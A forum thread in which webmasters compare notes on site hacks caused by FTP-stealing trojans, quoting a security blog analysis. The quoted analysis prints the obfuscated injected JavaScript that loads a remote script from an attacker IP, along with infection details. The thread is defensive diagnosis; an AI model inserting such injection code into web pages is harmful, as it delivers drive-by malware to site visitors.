js script - for Juliet

yes, and I just posted in threads I found after out site got hacked. I just wanted to add traffic mentioning the ip addy in case more hit the same problem. And since the number of hits on a google search for it have jumped from 42 to 355 I'd say others are hitting it too. Probably no reason to post over there too, people will find this.

It sounds like you got a different method of infection. For us it happened while no one was actually logged in(based on talking to them), but a different machine did the login using a users credentials(based on ftp lot). The FTP log had the ip address and user info in it and thats how we determined it. But it sounds like you verified it was her logging in and not just her login being used so that is a little different. I'd agree you need to have her clean up the machine before allowing access!

 

Hello all,

I got exactely the same web site hack on all the website I was taking care.
I think that the hacker could grab the password XML file from filezilla...
I'm pretty sure... nut I don't know how it could happen ...
It happen twice on a web site, and also on a web site where I entered the password without saving it !
This is incredible.

With sysinternals tools, I could figure out (and NO A single spyware, anti virus software could) the virus actions, this is similar to this :

http://www.threatexpert.com/report.aspx?md5=791509d03706cbc8883536b5131341d4

I've had acrobat 7.1 that I have upgraded to 9.1
Changed all system passwords.

I'm watching my database registry .... but I'm not sure I have killed the trojan...


if someone finds HOW THE FTP PASSWORDS were hacked ... this would be great.
I'm suspecting keyboard hook also...

Al.

 

(i have written a long message before this one ?? where is it ?...)
Another thing :
FTP log from the server proved that this is not my machine that did the Html code injection. I'm 100% sure.
AL.

Hello all ,

I have the same issue, all my web sites where hacked...

After hours of work,
I have discovered a Trojan called
Spy-Agent.Cm or
Win32/Delf.OEX

I think it can be responsible of all our annoyances...
Al.

 

Please get an export of the following registry key from any suspected machine and post it here.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32

As shown in the ThreatExpert link from alphonse777, the culprit may show up there.

 

Hello all,
I think I got contaminated by a trojan called Trojan.SilentBanker
I've got many signs that proves that...
I'm just amazed how this trojan got installed with firewall and ESET antivirus enabled.

Thanks

 

94.247.2.195

Here are some interesting notes I found at
http://blog.scansafe.com/
This hints at a lot of the vague clues I noticed, including the unfamiliar php files I found on the web site and the possibility of more than one form of compromise.

"
Malware Manipulating Google SERPs
Over the past few months, ScanSafe has been tracking malware that incorporates a couple of crafty Black Hat SEO techniques to manipulate Google SERPs. Because of the nature of how the attacks work, the rate of the attacks have been increasing exponentially and have now grown considerably large.

The attacks are perpetuated through compromise of legitimate sites. Once a visitor to a compromised site has been infected with the trojan, any sites that they manage will then also be susceptible to compromise. (One component of the malware is its ability to monitor traffic and steal FTP credentials). Though stolen FTP credentials appear to be the most common method employed in these particular attacks, compromise can also occur via standard methods, such as poor configuration settings, vulnerable Web apps, and so on.

The malicious script embedded during the compromise is usually placed on other .js or .php file rather than directly on the default home page for the site. For example, menu files, login pages, and similar types of content feeds are generally targed. This technique could enable the signs of the compromise to bypass casual observation. The embedded script is as follows:

document.write(unescape('%3CRhSsc5uriptUd%20sPQrCRc%3D5u%2F5u%2F9CR4sW%2E5u24R6M7GS%2EPQ2PQ%2E1Ud95%2FsWj5uqusWeUdrsWy%2EGSjs%3E%3CCR%2FsRhScR6Mript%3E').replace(/R6M|RhS|GS|5u|Ud|PQ|CR|sW/g," "));

This leads to 94.247.2.195 which resolves to hs.2-195.zlkon.lv, hosted by Datoru Express Serviss, Latvia. Of course, physical host location and whois information may bear little resemblance to the actual attackers.

When Web surfers visit one of these compromised sites, the embedded script leads to a cocktail of PDF, Flash, and MDAC exploits which result in the creation of an executable (typically named iexplorer.exe) and two batch files (C:\_.bat and C:\_.t). The batch files ensure the executable gets moved and renamed. The malware's final filename and location are random, examples include:

%windir%\flvc.ebi
%windir%\bpagokx.nmy
%windir%\system32\oka.cdq

The file is loaded by registering it as an auxiliary sound driver:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
"aux "= "<path and filename of trojan> "

This causes the malware to load when any sound-enabled application, i.e. any browser, is launched. The malware monitors traffic to and from the browser (and thus enables the malware to steal usernames and passwords and other sensitive information). When infected users perform certain Google searches, the search engine results page (SERP) is manipulated so that affiliate links are replacing the legitimate links. Cookie stuffing is used so that the links presented appear normal, i.e. the affiliate ID is not exposed, but the rogue affiliate gets full credit for the unintended click through.

Given the escalation of these attacks, it appears that someone is making a great deal of money.
"

----------------------------------

 

Thanks Backroad! That is exactly what hit us and now I have an easy way to check users machines to see if they are compromised. Thanks a lot!!